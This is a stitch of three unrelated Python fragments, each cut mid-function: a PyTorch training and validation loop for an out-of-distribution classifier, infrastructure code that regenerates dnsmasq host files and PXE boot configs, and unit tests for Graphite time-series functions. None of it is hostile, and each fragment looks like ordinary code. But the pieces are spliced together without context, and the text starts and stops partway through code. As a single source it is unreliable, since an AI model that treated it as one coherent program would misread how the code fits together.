like_out_out = torch.logsumexp(model.mm_out(noise.view(noise.shape[0], -1)), 0 )
loss1 = criterion(output, target)
loss2 = -output_adv.mean()
loss3 = - torch.logsumexp(torch.stack([log_p_in + like_in_in,
log_p_out + like_in_out], 0), 0).mean()
loss4 = - torch.logsumexp(torch.stack([log_p_in + like_out_in,
log_p_out + like_out_out], 0), 0).mean()
loss = p_in*(loss1 + loss3) + p_out*(loss2 + loss4)
loss.backward()
optimizer.step()
likelihood_loss += loss3.item()
train_loss += loss.item()
_, predicted = output.max(1)
correct += predicted.eq(target).sum().item()
threshold = model.mm.logvar.max() + margin
idx = model.mm_out.logvar<threshold
model.mm_out.logvar.data[idx] = threshold
if (batch_idx % verbose == 0) and verbose>0:
print('Train Epoch: {} [{}/{} ({:.0f}%)]\tLoss: {:.6f}'.format(
epoch, batch_idx * len(data), len(train_loader.dataset),
100. * batch_idx / len(train_loader), loss.item()))
print('Time: ', time.time() - start)
def validate(val_loader, model, criterion, epoch):
"""Perform validation on the validation set"""
batch_time = AverageMeter()
losses = AverageMeter()
top1 = AverageMeter()
# switch to evaluate mode
model.eval()
end = time.time()
for i, (input, target) in enumerate(val_loader):
input = input.cuda()
target = target.cuda()
# compute output
output = model(input)
loss = criterion(output, target)
# measure accuracy and record loss
prec1 = accuracy(output.data, target, topk=(1,))[0]
losses.update(loss.data, input.size(0))
top1.update(prec1, input.size(0))
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
if i % args.print_freq == 0:
print('Test: [{0}/{1}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'Prec@1 {top1.val:.3f} ({top1.avg:.3f})'.format(
i, len(val_loader), batch_time=batch_time, loss=losses,
top1=top1))
print(' * Prec@1 {top1.avg:.3f}'.format(top1=top1))
# log to TensorBoard
if args.tensorboard:
log_value('val_loss', losses.avg, epoch)
log_value('val_acc', top1.avg, epoch)
return top1.avg
def save_checkpoint(state, epoch):
"""Saves checkpoint to disk"""
directory = "checkpoints/{in_dataset}/{name}/".format(in_dataset=args.in_dataset, name=args.name)
if not os.path.exists(directory):
os.makedirs(directory)
filename = directory + 'checkpoint_{}.pth.tar'.format(epoch)
torch.save(state, filename)
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def adjust_learning_rate(optimizer, epoch, lr_schedule=[50, 75, 90]):
"""Sets the | |
mac_address = existing_host.mgmt_mac
else:
mac_address = None
line = self._dnsmasq_host_entry_to_string(address.address,
hostname,
mac_address)
f_out.write(line)
# Update host files atomically and reload dnsmasq
if (not os.path.isfile(dnsmasq_hosts_file) or
not filecmp.cmp(temp_dnsmasq_hosts_file, dnsmasq_hosts_file)):
os.rename(temp_dnsmasq_hosts_file, dnsmasq_hosts_file)
if (not os.path.isfile(dnsmasq_addn_hosts_file) or
not filecmp.cmp(temp_dnsmasq_addn_hosts_file,
dnsmasq_addn_hosts_file)):
os.rename(temp_dnsmasq_addn_hosts_file, dnsmasq_addn_hosts_file)
# If there is no distributed cloud addn_hosts file, create an empty one
# so dnsmasq will not complain.
dnsmasq_addn_hosts_dc_file = os.path.join(tsc.CONFIG_PATH, 'dnsmasq.addn_hosts_dc')
temp_dnsmasq_addn_hosts_dc_file = os.path.join(tsc.CONFIG_PATH, 'dnsmasq.addn_hosts_dc.temp')
if not os.path.isfile(dnsmasq_addn_hosts_dc_file):
with open(temp_dnsmasq_addn_hosts_dc_file, 'w') as f_out_addn_dc:
f_out_addn_dc.write(' ')
os.rename(temp_dnsmasq_addn_hosts_dc_file, dnsmasq_addn_hosts_dc_file)
os.system("pkill -HUP dnsmasq")
def _update_pxe_config(self, host, load=None):
"""Set up the PXE config file for this host so it can run
the installer.
This method must always be backward compatible with the previous
software release. During upgrades, this method is called when
locking/unlocking hosts running the previous release and when
downgrading a host. In both cases, it must be able to re-generate
the host's pxe config files appropriate to that host's software
version, using the pxeboot-update-<release>.sh script from the
previous release.
:param host: host object.
"""
sw_version = tsc.SW_VERSION
if load:
sw_version = load.software_version
else:
# No load provided, look it up...
host_upgrade = self.dbapi.host_upgrade_get_by_host(host.id)
target_load = self.dbapi.load_get(host_upgrade.target_load)
sw_version = target_load.software_version
if (host.personality == constants.CONTROLLER and
constants.WORKER in tsc.subfunctions):
if constants.LOWLATENCY in host.subfunctions:
pxe_config = "pxe-smallsystem_lowlatency-install-%s" % sw_version
else:
pxe_config = "pxe-smallsystem-install-%s" % sw_version
elif host.personality == constants.CONTROLLER:
pxe_config = "pxe-controller-install-%s" % sw_version
elif host.personality == constants.WORKER:
if constants.LOWLATENCY in host.subfunctions:
pxe_config = "pxe-worker_lowlatency-install-%s" % sw_version
else:
pxe_config = "pxe-worker-install-%s" % sw_version
elif host.personality == constants.STORAGE:
pxe_config = "pxe-storage-install-%s" % sw_version
# Defaults for configurable install parameters
install_opts = []
boot_device = host.get('boot_device') or "/dev/sda"
install_opts += ['-b', boot_device]
rootfs_device = host.get('rootfs_device') or "/dev/sda"
install_opts += ['-r', rootfs_device]
install_output = host.get('install_output') or "text"
if install_output == "text":
install_output_arg = "-t"
elif install_output == "graphical":
install_output_arg = "-g"
else:
LOG.warning("install_output set to invalid value (%s)"
% install_output)
install_output_arg = "-t"
install_opts += [install_output_arg]
# This version check MUST be present. The -u option does not exists
# prior to v17.00. This method is also called during upgrades to
# re-generate the host's pxe config files to the appropriate host's
# software version. It is required specifically when we downgrade a
# host or when we lock/unlock a host.
if sw_version != tsc.SW_VERSION_1610:
host_uuid = host.get('uuid')
notify_url = \
"http://pxecontroller:%d/v1/ihosts/%s/install_progress" % \
(CONF.sysinv_api_port, host_uuid)
install_opts += ['-u', notify_url]
system = self.dbapi.isystem_get_one()
# This version check MUST be present. The -s option
# (security profile) does not exist 17.06 and below.
if sw_version != tsc.SW_VERSION_1706:
secprofile = system.security_profile
# ensure that the securtiy profile selection is valid
if secprofile not in [constants.SYSTEM_SECURITY_PROFILE_STANDARD,
constants.SYSTEM_SECURITY_PROFILE_EXTENDED]:
LOG.error("Security Profile (%s) not a valid selection. "
"Defaulting to: %s" % (secprofile,
constants.SYSTEM_SECURITY_PROFILE_STANDARD))
secprofile = constants.SYSTEM_SECURITY_PROFILE_STANDARD
install_opts += ['-s', secprofile]
# If 'console' is not present in ihost_obj, we want to use the default.
# If, however, it is present and is explicitly set to None or "", then
# we don't specify the -c argument at all.
if 'console' not in host:
console = "ttyS0,115200"
else:
console = host.get('console')
if console is not None and console != "":
install_opts += ['-c', console]
# If 'tboot' is present in ihost_obj, retrieve and send the value
if 'tboot' in host:
tboot = host.get('tboot')
if tboot is not None and tboot != "":
install_opts += ['-T', tboot]
# This version check MUST be present. The -k option
# (extra_kernel_args) does not exist 18.03 and below.
if sw_version != tsc.SW_VERSION_1706 and \
sw_version != tsc.SW_VERSION_1803:
install_opts += ['-k', system.security_feature]
base_url = "http://pxecontroller:%d" % cutils.get_http_port(self.dbapi)
install_opts += ['-l', base_url]
if host['mgmt_mac']:
dashed_mac = host["mgmt_mac"].replace(":", "-")
pxeboot_update = "/usr/sbin/pxeboot-update-%s.sh" % sw_version
# Remove an old file if it exists
try:
os.remove("/pxeboot/pxelinux.cfg/01-" + dashed_mac)
except OSError:
pass
try:
os.remove("/pxeboot/pxelinux.cfg/efi-01-" + dashed_mac)
except OSError:
pass
with open(os.devnull, "w") as fnull:
try:
subprocess.check_call(
[pxeboot_update, "-i", "/pxeboot/pxelinux.cfg.files/" +
pxe_config, "-o", "/pxeboot/pxelinux.cfg/01-" +
dashed_mac] + install_opts,
stdout=fnull,
stderr=fnull)
except subprocess.CalledProcessError:
raise exception.SysinvException(_(
"Failed to create pxelinux.cfg file"))
def _remove_pxe_config(self, host):
"""Delete the PXE config file for this host.
:param host: host object.
"""
if host.mgmt_mac:
dashed_mac = host.mgmt_mac.replace(":", "-")
# Remove the old file if it exists
try:
os.remove("/pxeboot/pxelinux.cfg/01-" + dashed_mac)
except OSError:
pass
try:
os.remove("/pxeboot/pxelinux.cfg/efi-01-" + dashed_mac)
except OSError:
pass
def _create_or_update_address(self, context, hostname, ip_address,
iface_type, iface_id=None):
if hostname is None or ip_address is None:
return
address_name = cutils.format_address_name(hostname, iface_type)
address_family = IPNetwork(ip_address).version
try:
address = self.dbapi.address_get_by_address(ip_address)
address_uuid = address['uuid']
# If name is already set, return
if (self.dbapi.address_get_by_name(address_name) ==
address_uuid and iface_id is None):
return
except exception.AddressNotFoundByAddress:
address_uuid = None
except exception.AddressNotFoundByName:
pass
network = self.dbapi.network_get_by_type(iface_type)
address_pool_uuid = network.pool_uuid
address_pool = self.dbapi.address_pool_get(address_pool_uuid)
values = {
'name': address_name,
'family': address_family,
'prefix': address_pool.prefix,
'address': ip_address,
'address_pool_id': address_pool.id,
}
if iface_id:
values['interface_id'] = iface_id
if address_uuid:
address = self.dbapi.address_update(address_uuid, values)
else:
address = self.dbapi.address_create(values)
self._generate_dnsmasq_hosts_file()
return address
def _allocate_pool_address(self, interface_id, pool_uuid, address_name):
return address_pool.AddressPoolController.assign_address(
interface_id, pool_uuid, address_name, dbapi=self.dbapi
)
def _allocate_addresses_for_host(self, context, host):
"""Allocates addresses for a given host.
Does the following tasks:
- Check if addresses exist for host
- Allocate addresses for host from pools
- Update ihost with mgmt address
- Regenerate the dnsmasq hosts file
:param context: request context
:param host: host object
"""
mgmt_ip = host.mgmt_ip
mgmt_interfaces = self.iinterfaces_get_by_ihost_nettype(
context, host.uuid, constants.NETWORK_TYPE_MGMT
)
mgmt_interface_id = None
if mgmt_interfaces:
mgmt_interface_id = mgmt_interfaces[0]['id']
hostname = host.hostname
address_name = cutils.format_address_name(hostname,
constants.NETWORK_TYPE_MGMT)
# if ihost has mgmt_ip, make sure address in address table
if mgmt_ip:
self._create_or_update_address(context, hostname, mgmt_ip,
constants.NETWORK_TYPE_MGMT,
mgmt_interface_id)
# if ihost has no management IP, check for static mgmt IP
if not mgmt_ip:
mgmt_ip = self._lookup_static_ip_address(
hostname, constants.NETWORK_TYPE_MGMT
)
if mgmt_ip:
host.mgmt_ip = mgmt_ip
self.update_ihost(context, host)
# if no static address, then allocate one
if not mgmt_ip:
mgmt_pool = self.dbapi.network_get_by_type(
constants.NETWORK_TYPE_MGMT
).pool_uuid
mgmt_ip = self._allocate_pool_address(mgmt_interface_id, mgmt_pool,
address_name).address
if mgmt_ip:
host.mgmt_ip = mgmt_ip
self.update_ihost(context, host)
self._generate_dnsmasq_hosts_file(existing_host=host)
def get_my_host_id(self):
if not ConductorManager.my_host_id:
local_hostname = socket.gethostname()
controller = self.dbapi.ihost_get(local_hostname)
ConductorManager.my_host_id = controller['id']
return ConductorManager.my_host_id
def get_dhcp_server_duid(self):
"""Retrieves the server DUID from the local DHCP server lease file."""
lease_filename = tsc.CONFIG_PATH + 'dnsmasq.leases'
with open(lease_filename, 'r') as lease_file:
for columns in (line.strip().split() for line in lease_file):
if len(columns) != 2:
continue
keyword, value = columns
if keyword.lower() == "duid":
return value
def _dhcp_release(self, interface, ip_address, mac_address, cid=None):
"""Release a given DHCP lease"""
params = [interface, ip_address, mac_address]
if cid:
params += [cid]
if IPAddress(ip_address).version == 6:
params = ["--ip", ip_address,
"--iface", interface,
"--server-id", self.get_dhcp_server_duid(),
"--client-id", cid,
"--iaid", str(cutils.get_dhcp_client_iaid(mac_address))]
LOG.warning("Invoking dhcp_release6 for {}".format(params))
subprocess.call(["dhcp_release6"] + params)
else:
LOG.warning("Invoking dhcp_release for {}".format(params))
subprocess.call(["dhcp_release"] + params)
def _find_networktype_for_address(self, ip_address):
for network in self.dbapi.networks_get_all():
pool = self.dbapi.address_pool_get(network.pool_uuid)
subnet = IPNetwork(pool.network + '/' + str(pool.prefix))
address = IPAddress(ip_address)
if address in subnet:
return network.type
def _find_local_interface_name(self, network_type):
"""Lookup the local interface name for a given network type."""
host_id = self.get_my_host_id()
interface_list = self.dbapi.iinterface_get_all(host_id, expunge=True)
ifaces = dict((i['ifname'], i) for i in interface_list)
port_list = self.dbapi.port_get_all(host_id)
ports = dict((p['interface_id'], p) for p in port_list)
for interface in interface_list:
if network_type in interface.networktypelist:
return cutils.get_interface_os_ifname(interface, ifaces, ports)
def _find_local_mgmt_interface_vlan_id(self):
"""Lookup the local interface name for a given network type."""
host_id = self.get_my_host_id()
interface_list = self.dbapi.iinterface_get_all(host_id, expunge=True)
for interface in interface_list:
if constants.NETWORK_TYPE_MGMT in interface.networktypelist:
if 'vlan_id' not in interface:
return 0
else:
return interface['vlan_id']
def _remove_leases_by_mac_address(self, mac_address):
"""Remove any leases that were added without a CID that we were not
able to delete. This is specifically looking for leases on the pxeboot
network that may still be present but will also handle the unlikely
event of deleting an old host during an upgrade. Hosts on previous
releases did not register a CID on the mgmt interface."""
lease_filename = tsc.CONFIG_PATH + 'dnsmasq.leases'
try:
with open(lease_filename, 'r') as lease_file:
for columns in (line.strip().split() for line in lease_file):
if len(columns) != 5:
continue
timestamp, address, ip_address, hostname, cid = columns
if address != mac_address:
continue
network_type = self._find_networktype_for_address(ip_address)
if not network_type:
# Not one | |
functions.perSecond({}, seriesList)
self.assertEqual(expected, result, 'perSecond result incorrect')
def test_perSecond_nones(self):
seriesList = [TimeSeries('test', 0, 600, 60, [0, 60, None, 180, None, 300, None, 420, None, 540])]
expected = [TimeSeries('perSecond(test)', 0, 600, 60, [None, 1, None, 1, None, 1, None, 1, None, 1])]
result = functions.perSecond({}, seriesList)
self.assertEqual(expected, result, 'perSecond result incorrect')
def test_perSecond_max(self):
seriesList = [TimeSeries('test', 0, 600, 60, [0, 120, 240, 480, 960, 900, 120, 240, 120, 0])]
expected = [TimeSeries('perSecond(test)', 0, 600, 60, [None, 2, 2, 4, 8, None, -5, 2, 6, 6])]
result = functions.perSecond({}, seriesList, 480)
self.assertEqual(expected, result, 'perSecond result incorrect')
def test_integral(self):
seriesList = [TimeSeries('test', 0, 600, 60, [None, 1, 2, 3, 4, 5, None, 6, 7, 8])]
expected = [TimeSeries('integral(test)', 0, 600, 60, [None, 1, 3, 6, 10, 15, None, 21, 28, 36])]
result = functions.integral({}, seriesList)
self.assertEqual(expected, result, 'integral result incorrect')
def test_integralByInterval(self):
seriesList = [TimeSeries('test', 0, 600, 60, [None, 1, 2, 3, 4, 5, None, 6, 7, 8])]
expected = [TimeSeries("integralByInterval(test,'2min')", 0, 600, 60, [0, 1, 2, 5, 4, 9, 0, 6, 7, 15])]
result = functions.integralByInterval({'startTime' : datetime(1970,1,1)}, seriesList, '2min')
self.assertEqual(expected, result, 'integralByInterval result incorrect %s %s' %(result, expected))
def test_stacked(self):
seriesList = [
TimeSeries('collectd.test-db1.load.value',0,600,60,[1,2,3,4,5,6,7,8,9,10]),
TimeSeries('collectd.test-db2.load.value',0,600,60,[None,2,None,4,None,6,None,8,None,10]),
TimeSeries('collectd.test-db3.load.value',0,600,60,[1,2,None,None,None,6,7,8,9,10]),
TimeSeries('collectd.test-db4.load.value',0,600,60,[1,2,3,4,5,6,7,8,9,None]),
]
for series in seriesList:
series.pathExpression = series.name
expectedResult = [
TimeSeries('stacked(collectd.test-db1.load.value)',0,600,60,[1,2,3,4,5,6,7,8,9,10]),
TimeSeries('stacked(collectd.test-db2.load.value)',0,600,60,[None,4,None,8,None,12,None,16,None,20]),
TimeSeries('stacked(collectd.test-db3.load.value)',0,600,60,[2,6,None,None,None,18,14,24,18,30]),
TimeSeries('stacked(collectd.test-db4.load.value)',0,600,60,[3,8,6,12,10,24,21,32,27,None]),
]
for series in expectedResult:
series.options = {'stacked': True}
request_context = {}
result = functions.stacked(request_context, seriesList)
self.assertEqual(result, expectedResult)
self.assertEqual(request_context, {'totalStack': {'__DEFAULT__': [3,8,6,12,10,24,21,32,27,30]}})
def test_stacked_with_name(self):
seriesList = [
TimeSeries('collectd.test-db1.load.value',0,600,60,[1,2,3,4,5,6,7,8,9,10]),
TimeSeries('collectd.test-db2.load.value',0,600,60,[None,2,None,4,None,6,None,8,None,10]),
TimeSeries('collectd.test-db3.load.value',0,600,60,[1,2,None,None,None,6,7,8,9,10]),
TimeSeries('collectd.test-db4.load.value',0,600,60,[1,2,3,4,5,6,7,8,9,None]),
]
for series in seriesList:
series.pathExpression = series.name
expectedResult = [
TimeSeries('collectd.test-db1.load.value',0,600,60,[1,2,3,4,5,6,7,8,9,10]),
TimeSeries('collectd.test-db2.load.value',0,600,60,[None,4,None,8,None,12,None,16,None,20]),
TimeSeries('collectd.test-db3.load.value',0,600,60,[2,6,None,None,None,18,14,24,18,30]),
TimeSeries('collectd.test-db4.load.value',0,600,60,[3,8,6,12,10,24,21,32,27,None]),
]
for series in expectedResult:
series.options = {'stacked': True}
request_context = {'totalStack': {'my_fun_stack': [0,0,0,0,0,0,0,0,0,0]}}
result = functions.stacked(request_context, seriesList, 'my_fun_stack')
self.assertEqual(result, expectedResult)
self.assertEqual(request_context, {'totalStack': {'my_fun_stack': [3,8,6,12,10,24,21,32,27,30]}})
def test_areaBetween(self):
seriesList = [
TimeSeries('collectd.test-db1.load.value',0,600,60,[1,2,3,4,5,6,7,8,9,10]),
TimeSeries('collectd.test-db2.load.value',0,600,60,[1,2,3,4,5,6,7,8,9,10]),
]
for series in seriesList:
series.pathExpression = series.name
expectedResult = [
TimeSeries('areaBetween(collectd.test-db2.load.value)',0,600,60,[1,2,3,4,5,6,7,8,9,10]),
TimeSeries('areaBetween(collectd.test-db2.load.value)',0,600,60,[1,2,3,4,5,6,7,8,9,10]),
]
expectedResult[0].options = {'stacked': True, 'invisible': True}
expectedResult[1].options = {'stacked': True}
request_context = {}
result = functions.areaBetween(request_context, seriesList)
self.assertEqual(result, expectedResult)
def test_cactiStyle(self):
seriesList = [
TimeSeries('collectd.test-db1.load.value',0,600,60,[1,2,3,4,5,6,7,8,9,10]),
TimeSeries('collectd.test-db2.load.value',0,600,60,[None,None,None,None,None,None,None,None,None,None]),
TimeSeries('collectd.test-db3.load.value',0,600,60,[1,2,None,None,None,6,7,8,9,10]),
TimeSeries('collectd.test-db4.load.value',0,600,60,[1,2,3,4,5,6,7,8,9,None]),
]
for series in seriesList:
series.pathExpression = series.name
expectedResult = [
TimeSeries('collectd.test-db1.load.value Current:10.00 Max:10.00 Min:1.00 ',0,600,60,[1,2,3,4,5,6,7,8,9,10]),
TimeSeries('collectd.test-db2.load.value Current:nan Max:nan Min:nan ',0,600,60,[None,None,None,None,None,None,None,None,None,None]),
TimeSeries('collectd.test-db3.load.value Current:10.00 Max:10.00 Min:1.00 ',0,600,60,[1,2,None,None,None,6,7,8,9,10]),
TimeSeries('collectd.test-db4.load.value Current:9.00 Max:9.00 Min:1.00 ',0,600,60,[1,2,3,4,5,6,7,8,9,None]),
]
for series in expectedResult:
series.options = {}
request_context = {}
result = functions.cactiStyle(request_context, seriesList)
self.assertEqual(result, expectedResult)
def test_cactiStyle_units(self):
seriesList = [
TimeSeries('collectd.test-db1.load.value',0,600,60,[1,2,3,4,5,6,7,8,9,10]),
TimeSeries('collectd.test-db2.load.value',0,600,60,[None,None,None,None,None,None,None,None,None,None]),
TimeSeries('collectd.test-db3.load.value',0,600,60,[1,2,None,None,None,6,7,8,9,10]),
TimeSeries('collectd.test-db4.load.value',0,600,60,[1,2,3,4,5,6,7,8,9,None]),
]
for series in seriesList:
series.pathExpression = series.name
expectedResult = [
TimeSeries('collectd.test-db1.load.value Current:10.00 b Max:10.00 b Min:1.00 b ',0,600,60,[1,2,3,4,5,6,7,8,9,10]),
TimeSeries('collectd.test-db2.load.value Current:nan Max:nan Min:nan ',0,600,60,[None,None,None,None,None,None,None,None,None,None]),
TimeSeries('collectd.test-db3.load.value Current:10.00 b Max:10.00 b Min:1.00 b ',0,600,60,[1,2,None,None,None,6,7,8,9,10]),
TimeSeries('collectd.test-db4.load.value Current:9.00 b Max:9.00 b Min:1.00 b ',0,600,60,[1,2,3,4,5,6,7,8,9,None]),
]
for series in expectedResult:
series.options = {}
request_context = {}
result = functions.cactiStyle(request_context, seriesList, units="b")
self.assertEqual(result, expectedResult)
def test_cactiStyle_emptyList(self):
result = functions.cactiStyle({}, [])
self.assertEqual(result, [])
def test_cactiStyle_binary(self):
seriesList = [
TimeSeries('collectd.test-db1.load.value',0,600,60,[1,2,3,4,5,6,7,8,9,10]),
TimeSeries('collectd.test-db2.load.value',0,600,60,[None,None,None,None,None,None,None,None,None,None]),
TimeSeries('collectd.test-db3.load.value',0,600,60,[1,2,None,None,None,6,7,8,9,10]),
TimeSeries('collectd.test-db4.load.value',0,600,60,[1,2,3,4,5,6,7,8,9,None]),
]
for series in seriesList:
series.pathExpression = series.name
expectedResult = [
TimeSeries('collectd.test-db1.load.value Current:10.00 Max:10.00 Min:1.00 ',0,600,60,[1,2,3,4,5,6,7,8,9,10]),
TimeSeries('collectd.test-db2.load.value Current:nan Max:nan Min:nan ',0,600,60,[None,None,None,None,None,None,None,None,None,None]),
TimeSeries('collectd.test-db3.load.value Current:10.00 Max:10.00 Min:1.00 ',0,600,60,[1,2,None,None,None,6,7,8,9,10]),
TimeSeries('collectd.test-db4.load.value Current:9.00 Max:9.00 Min:1.00 ',0,600,60,[1,2,3,4,5,6,7,8,9,None]),
]
for series in expectedResult:
series.options = {}
request_context = {}
result = functions.cactiStyle(request_context, seriesList, "binary")
self.assertEqual(result, expectedResult)
def test_cactiStyle_binary_units(self):
seriesList = [
TimeSeries('collectd.test-db1.load.value',0,600,60,[1,2,3,4,5,6,7,8,9,10]),
TimeSeries('collectd.test-db2.load.value',0,600,60,[None,None,None,None,None,None,None,None,None,None]),
TimeSeries('collectd.test-db3.load.value',0,600,60,[1,2,None,None,None,6,7,8,9,10]),
TimeSeries('collectd.test-db4.load.value',0,600,60,[1,2,3,4,5,6,7,8,9,None]),
]
for series in seriesList:
series.pathExpression = series.name
expectedResult = [
TimeSeries('collectd.test-db1.load.value Current:10.00 b Max:10.00 b Min:1.00 b ',0,600,60,[1,2,3,4,5,6,7,8,9,10]),
TimeSeries('collectd.test-db2.load.value Current:nan Max:nan Min:nan ',0,600,60,[None,None,None,None,None,None,None,None,None,None]),
TimeSeries('collectd.test-db3.load.value Current:10.00 b Max:10.00 b Min:1.00 b ',0,600,60,[1,2,None,None,None,6,7,8,9,10]),
TimeSeries('collectd.test-db4.load.value Current:9.00 b Max:9.00 b Min:1.00 b ',0,600,60,[1,2,3,4,5,6,7,8,9,None]),
]
for series in expectedResult:
series.options = {}
request_context = {}
result = functions.cactiStyle(request_context, seriesList, "binary", "b")
self.assertEqual(result, expectedResult)
def test_n_percentile(self):
config = [
[15, 35, 20, 40, 50],
range(1, 101),
range(1, 201),
range(1, 301),
range(0, 100),
range(0, 200),
range(0, 300),
# Ensure None values in list has no effect.
[None, None, None] + range(0, 300),
]
def n_percentile(perc, expect):
seriesList = []
expected = []
for i, c in enumerate(config):
seriesList.append(TimeSeries('Test(%d)' % i, 0, len(c), 1, c))
expected.append(TimeSeries('nPercentile(Test(%d), %d)' % (i, perc), 0, len(c), 1, expect[i]*len(c)))
result = functions.nPercentile({}, seriesList, perc)
self.assertEqual(expected, result)
n_percentile(30, [[20], [31], [61], [91], [30], [60], [90], [90]])
n_percentile(90, [[50], [91], [181], [271], [90], [180], [270], [270]])
n_percentile(95, [[50], [96], [191], [286], [95], [190], [285], [285]])
def test_averageOutsidePercentile_30(self):
seriesList = [
TimeSeries('collectd.test-db1.load.value',0,100,1,[7]*100),
TimeSeries('collectd.test-db2.load.value',0,100,1,[5]*100),
TimeSeries('collectd.test-db3.load.value',0,100,1,[10]*100),
TimeSeries('collectd.test-db4.load.value',0,100,1,[1]*100),
]
expectedResult = [
TimeSeries('collectd.test-db2.load.value',0,100,1,[5]*100),
TimeSeries('collectd.test-db3.load.value',0,100,1,[10]*100),
TimeSeries('collectd.test-db4.load.value',0,100,1,[1]*100),
]
result = functions.averageOutsidePercentile({}, seriesList, 30)
self.assertEqual(result, expectedResult)
def test_averageOutsidePercentile_70(self):
seriesList = [
TimeSeries('collectd.test-db1.load.value',0,100,1,[7]*100),
TimeSeries('collectd.test-db2.load.value',0,100,1,[5]*100),
TimeSeries('collectd.test-db3.load.value',0,100,1,[10]*100),
TimeSeries('collectd.test-db4.load.value',0,100,1,[1]*100),
]
expectedResult = [
TimeSeries('collectd.test-db2.load.value',0,100,1,[5]*100),
TimeSeries('collectd.test-db3.load.value',0,100,1,[10]*100),
TimeSeries('collectd.test-db4.load.value',0,100,1,[1]*100),
]
result = functions.averageOutsidePercentile({}, seriesList, 70)
self.assertEqual(result, expectedResult)
def test_removeBetweenPercentile_30(self):
seriesList = [
TimeSeries('collectd.test-db1.load.value',0,100,1,[7]*100),
TimeSeries('collectd.test-db2.load.value',0,100,1,[5]*100),
TimeSeries('collectd.test-db3.load.value',0,100,1,[10]*100),
TimeSeries('collectd.test-db4.load.value',0,100,1,[1]*100),
]
expectedResult = [
TimeSeries('collectd.test-db2.load.value',0,100,1,[5]*100),
TimeSeries('collectd.test-db3.load.value',0,100,1,[10]*100),
TimeSeries('collectd.test-db4.load.value',0,100,1,[1]*100),
]
result = functions.removeBetweenPercentile({}, seriesList, 30)
self.assertEqual(result, expectedResult)
def test_removeBetweenPercentile_70(self):
seriesList = [
TimeSeries('collectd.test-db1.load.value',0,100,1,[7]*100),
TimeSeries('collectd.test-db2.load.value',0,100,1,[5]*100),
TimeSeries('collectd.test-db3.load.value',0,100,1,[10]*100),
TimeSeries('collectd.test-db4.load.value',0,100,1,[1]*100),
]
expectedResult = [
TimeSeries('collectd.test-db2.load.value',0,100,1,[5]*100),
TimeSeries('collectd.test-db3.load.value',0,100,1,[10]*100),
TimeSeries('collectd.test-db4.load.value',0,100,1,[1]*100),
]
result = functions.removeBetweenPercentile({}, seriesList, 70)
self.assertEqual(result, expectedResult)
def test_sortByName(self):
seriesList = [
TimeSeries('collectd.test-db3.load.value',0,100,1,[10]*100),
TimeSeries('collectd.test-db2.load.value',0,100,1,[5]*100),
TimeSeries('collectd.test-db4.load.value',0,100,1,[1]*100),
TimeSeries('collectd.test-db1.load.value',0,100,1,[7]*100),
]
expectedResult = [
TimeSeries('collectd.test-db1.load.value',0,100,1,[7]*100),
TimeSeries('collectd.test-db2.load.value',0,100,1,[5]*100),
TimeSeries('collectd.test-db3.load.value',0,100,1,[10]*100),
TimeSeries('collectd.test-db4.load.value',0,100,1,[1]*100),
]
result = functions.sortByName({}, seriesList)
self.assertEqual(result, expectedResult)
def test_sortByName_natural(self):
seriesList = [
TimeSeries('collectd.test-db3.load.value',0,100,1,[10]*100),
TimeSeries('collectd.test-db2.load.value',0,100,1,[5]*100),
TimeSeries('collectd.test-db4.load.value',0,100,1,[1]*100),
TimeSeries('collectd.test-db1.load.value',0,100,1,[7]*100),
]
expectedResult = [
TimeSeries('collectd.test-db1.load.value',0,100,1,[7]*100),
TimeSeries('collectd.test-db2.load.value',0,100,1,[5]*100),
TimeSeries('collectd.test-db3.load.value',0,100,1,[10]*100),
TimeSeries('collectd.test-db4.load.value',0,100,1,[1]*100),
]
result = functions.sortByName({}, seriesList, True)
self.assertEqual(result, expectedResult)
def test_sorting_by_total(self):
seriesList = []
config = [[1000, 100, 10, 0], [1000, 100, 10, 1]]
for i, c in enumerate(config):
seriesList.append(TimeSeries('Test(%d)' % i, 0, 0, 0, c))
self.assertEqual(1110, functions.safeSum(seriesList[0]))
result = functions.sortByTotal({}, seriesList)
self.assertEqual(1111, functions.safeSum(result[0]))
self.assertEqual(1110, functions.safeSum(result[1]))
def test_sortByMaxima(self):
seriesList = [
TimeSeries('collectd.test-db3.load.value',0,100,1,[10]*100),
TimeSeries('collectd.test-db2.load.value',0,100,1,[5]*100),
TimeSeries('collectd.test-db4.load.value',0,100,1,[1]*100),
TimeSeries('collectd.test-db1.load.value',0,100,1,[7]*100),
]
expectedResult = [
TimeSeries('collectd.test-db3.load.value',0,100,1,[10]*100),
TimeSeries('collectd.test-db1.load.value',0,100,1,[7]*100),
TimeSeries('collectd.test-db2.load.value',0,100,1,[5]*100),
TimeSeries('collectd.test-db4.load.value',0,100,1,[1]*100),
]
result = functions.sortByMaxima({}, seriesList)
self.assertEqual(result, expectedResult)
def test_sortByMinima(self):
seriesList = [
TimeSeries('collectd.test-db3.load.value',0,100,1,[10]*100),
TimeSeries('collectd.test-db2.load.value',0,100,1,[5]*100),
TimeSeries('collectd.test-db4.load.value',0,100,1,[1]*100),
TimeSeries('collectd.test-db1.load.value',0,100,1,[7]*100),
]
expectedResult = [
TimeSeries('collectd.test-db4.load.value',0,100,1,[1]*100),
TimeSeries('collectd.test-db2.load.value',0,100,1,[5]*100),
TimeSeries('collectd.test-db1.load.value',0,100,1,[7]*100),
TimeSeries('collectd.test-db3.load.value',0,100,1,[10]*100),
]
result = functions.sortByMinima({}, seriesList)
self.assertEqual(result, expectedResult)
def _generate_series_list(self):
seriesList = []
config = [range(101), range(101), [1, None, None, None, None]]
for i, c in enumerate(config):
name = "collectd.test-db{0}.load.value".format(i + 1)
seriesList.append(TimeSeries(name, 0, len(c), 1, c))
for series in seriesList:
series.pathExpression = series.name
return seriesList
def test_check_empty_lists(self):
seriesList = []
config = [[1000, 100, 10, 0], []]
for i, c in enumerate(config):
seriesList.append(TimeSeries('Test(%d)' % i, 0, 0, 0, c))
self.assertTrue(functions.safeIsNotEmpty(seriesList[0]))
self.assertFalse(functions.safeIsNotEmpty(seriesList[1]))
result = functions.removeEmptySeries({}, seriesList)
self.assertEqual(1, len(result))
def test_remove_above_percentile(self):
seriesList = self._generate_series_list()
percent = 50
